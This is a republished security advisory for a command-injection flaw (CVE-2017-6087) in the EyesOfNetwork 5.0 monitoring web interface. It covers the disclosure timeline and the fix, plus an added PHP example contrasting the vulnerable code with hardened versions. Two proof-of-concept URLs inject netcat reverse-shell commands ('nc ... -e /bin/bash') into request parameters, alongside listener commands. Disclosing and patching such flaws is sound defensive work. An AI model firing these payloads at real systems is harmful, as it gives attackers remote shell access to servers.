EON 5.0 Remote Code Execution

2017.03.24
Credit: SYSDREAM Labs
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an open-source network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter request parameters before passing them to a shell, allowing authenticated users to execute arbitrary commands on the server.

**CVE ID**: CVE-2017-6087
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is used by the `shell_exec()` function. It is therefore possible to inject a payload such as the one in the request below, which connects back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command` variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
    if($value["type"] == true){
        if($key == "owner"){
            $event[$key] = $owner;
        }
        $ged_command .= "\"".$event[$key]."\" ";
    }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`

### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by the `exec()` function. Again, we inject our connect-back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is concatenated into the `exec()` command string without any sanitization:

```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {
    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
    # Redirect to module page if rpm installed
    if($module!=0) {
        header('Location: '.$_GET["link"].'');
    }
}
```

## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : First contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor acknowledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1.

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com> -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
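As an added example, not code from the advisory or from the EyesOfNetwork project, the PHP below places the two sinks described in the proofs of concept (the `$ged_command` loop from `ged_functions.php` and the `exec("rpm -q ...")` call from `module/index.php`) next to hardened versions built on `escapeshellarg()` and an allowlist. The function names, the sample `$packets` and `$event` arrays, and the way the `.eon` check is reproduced are assumptions made here; only the payloads are taken from the advisory.

```php
<?php
// Added example, not EyesOfNetwork code. The two injection sinks from the
// advisory are reproduced beside hardened versions. Function names and the
// sample inputs at the bottom are assumptions made for this illustration.

// PoC 1 pattern: user-influenced fields wrapped in hand-written double
// quotes and concatenated into a string that shell_exec() hands to the shell.
// The shell parses the whole string, so anything it treats specially in a
// field (a double quote, a command separator outside quotes) changes what
// actually runs.
function build_ged_command_vulnerable(array $event, array $array_ged_packets,
                                      $ged_type_nbr, string $owner): string {
    $ged_command = "-update -type $ged_type_nbr ";
    foreach ($array_ged_packets as $key => $value) {
        if ($value["type"] == true) {
            if ($key == "owner") {
                $event[$key] = $owner;
            }
            $ged_command .= "\"" . $event[$key] . "\" ";
        }
    }
    return trim($ged_command, " ");
}

// Hardened: each field becomes exactly one shell word. escapeshellarg()
// single-quotes the value and escapes embedded single quotes, so ; | & $ ` "
// and newlines lose their meaning. The numeric type is cast to an int so it
// cannot carry shell syntax either.
function build_ged_command_hardened(array $event, array $array_ged_packets,
                                    $ged_type_nbr, string $owner): string {
    $args = ['-update', '-type', (string) (int) $ged_type_nbr];
    foreach ($array_ged_packets as $key => $value) {
        if ($value["type"] == true) {
            $field = ($key == "owner") ? $owner : ($event[$key] ?? '');
            $args[] = escapeshellarg((string) $field);
        }
    }
    return implode(' ', $args);
}

// PoC 2 pattern: $_GET["module"] concatenated into exec(). A value starting
// with "|" turns the rest of it into another stage of the pipeline.
function module_installed_vulnerable(string $module): bool {
    $count = exec("rpm -q " . $module . " |grep '.eon' |wc -l");
    return $count != 0;
}

// Hardened: accept only characters an RPM package name can contain and fail
// closed otherwise; escape the value anyway; read rpm's exit status instead
// of piping through grep and wc.
function module_installed_hardened(string $module): bool {
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._+-]{0,127}\z/', $module)) {
        return false;
    }
    $out = [];
    $rc = 1;
    exec('rpm -q ' . escapeshellarg($module) . ' 2>/dev/null', $out, $rc);
    if ($rc !== 0) {
        return false; // rpm -q exits non-zero when the package is not installed
    }
    foreach ($out as $line) {
        if (strpos($line, '.eon') !== false) {
            return true;
        }
    }
    return false;
}

// Demonstration with the advisory's payloads (constructed inputs).
$packets = ['id' => ['type' => true], 'owner' => ['type' => true]];
$event   = ['id' => ';nc 10.0.5.124 1337 -e /bin/bash;', 'owner' => ''];

echo build_ged_command_vulnerable($event, $packets, '4', 'admin'), PHP_EOL;
echo build_ged_command_hardened($event, $packets, '4', 'admin'), PHP_EOL;

// A field carrying a double quote closes the hand-written quoting; the
// hardened builder still emits it as a single shell word.
$event['id'] = '"; nc 10.0.5.124 1337 -e /bin/bash; "';
echo build_ged_command_vulnerable($event, $packets, '4', 'admin'), PHP_EOL;
echo build_ged_command_hardened($event, $packets, '4', 'admin'), PHP_EOL;

// The PoC 2 payload never reaches exec() in the hardened check.
$payload2 = '|nc 192.168.1.14 1337 -e /bin/bash';
var_dump(module_installed_hardened($payload2));
```

Run with `php` on a host that has `rpm`; the `build_ged_command_*` functions only build strings and never execute anything, so the command-string comparison works anywhere. With the advisory's first payload, the vulnerable builder emits the value inside the hand-written double quotes, while the hardened builder emits it as one single-quoted word; with a value that itself contains a double quote, the vulnerable string is split by the shell into an empty argument followed by the injected `nc` command, whereas the hardened string is unchanged in structure. For the module check, the allowlist rejects the `|nc ...` value before any process is spawned, which is the property to verify when reviewing a fix: the payload should fail validation, not merely be escaped.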


Copyright 2024, cxsecurity.com
